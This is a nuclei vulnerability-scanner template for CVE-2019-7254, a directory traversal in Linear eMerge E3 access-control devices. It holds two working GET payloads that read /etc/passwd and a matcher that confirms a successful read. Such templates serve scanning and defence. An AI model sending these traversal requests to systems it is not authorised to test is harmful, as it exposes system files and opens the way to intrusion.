nuclei-templates/cves/2019/CVE-2019-7254.yaml

32 lines
749 B
YAML
Raw Normal View History

2021-06-13 10:05:02 +00:00
id: CVE-2019-7254
info:
name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47616
tags: emerge,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2019-7254
cwe-id: CWE-22
description: "Linear eMerge E3-Series devices allow File Inclusion."
2021-06-13 10:05:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-06-13 10:05:02 +00:00
- type: status
status:
- 200